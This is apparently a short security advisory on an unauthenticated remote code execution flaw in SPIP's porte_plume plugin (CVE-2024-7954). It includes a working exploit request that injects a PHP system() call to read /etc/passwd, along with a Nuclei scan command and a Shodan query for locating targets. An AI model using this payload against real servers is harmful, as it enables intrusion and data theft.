The porte_plume plugin, utilized by SPIP versions prior to 4.30-alpha2, 4.2.13, and 4.1.16, is susceptible to a critical arbitrary code execution (RCE) vulnerability. This flaw allows a remote, unauthenticated attacker to execute arbitrary PHP code as the SPIP user by crafting a specific HTTP request. The potential for exploitation is severe, enabling attackers to run malicious commands on the server, which could lead to unauthorized access, data breaches, or further system compromise.

• Affected Software: SPIP (prior to versions 4.30-alpha2, 4.2.13, and 4.1.16)
• Type of Vulnerability: Remote Code Execution (RCE)
• Severity Level: Critical
• Exploitability: Remote and unauthenticated attackers can exploit this vulnerability.

##Nuclei Scan

kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml

An example of a crafted HTTP request that can be used to exploit this vulnerability is as follows:

POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

• The POST request is directed to the porte_plume_previsu action of SPIP's index.php file.
• The data parameter contains a payload that leverages PHP's system() function to execute a command (in this case, cat /etc/passwd), which reads the contents of the password file.
• By changing the command within the system() function, an attacker could execute any PHP code on the server, leading to severe consequences.

To identify potentially vulnerable SPIP installations, the following Shodan search query can be used:

app="SPIP"

This vulnerability underscores the importance of keeping software up to date and implementing robust security measures to protect against exploitation.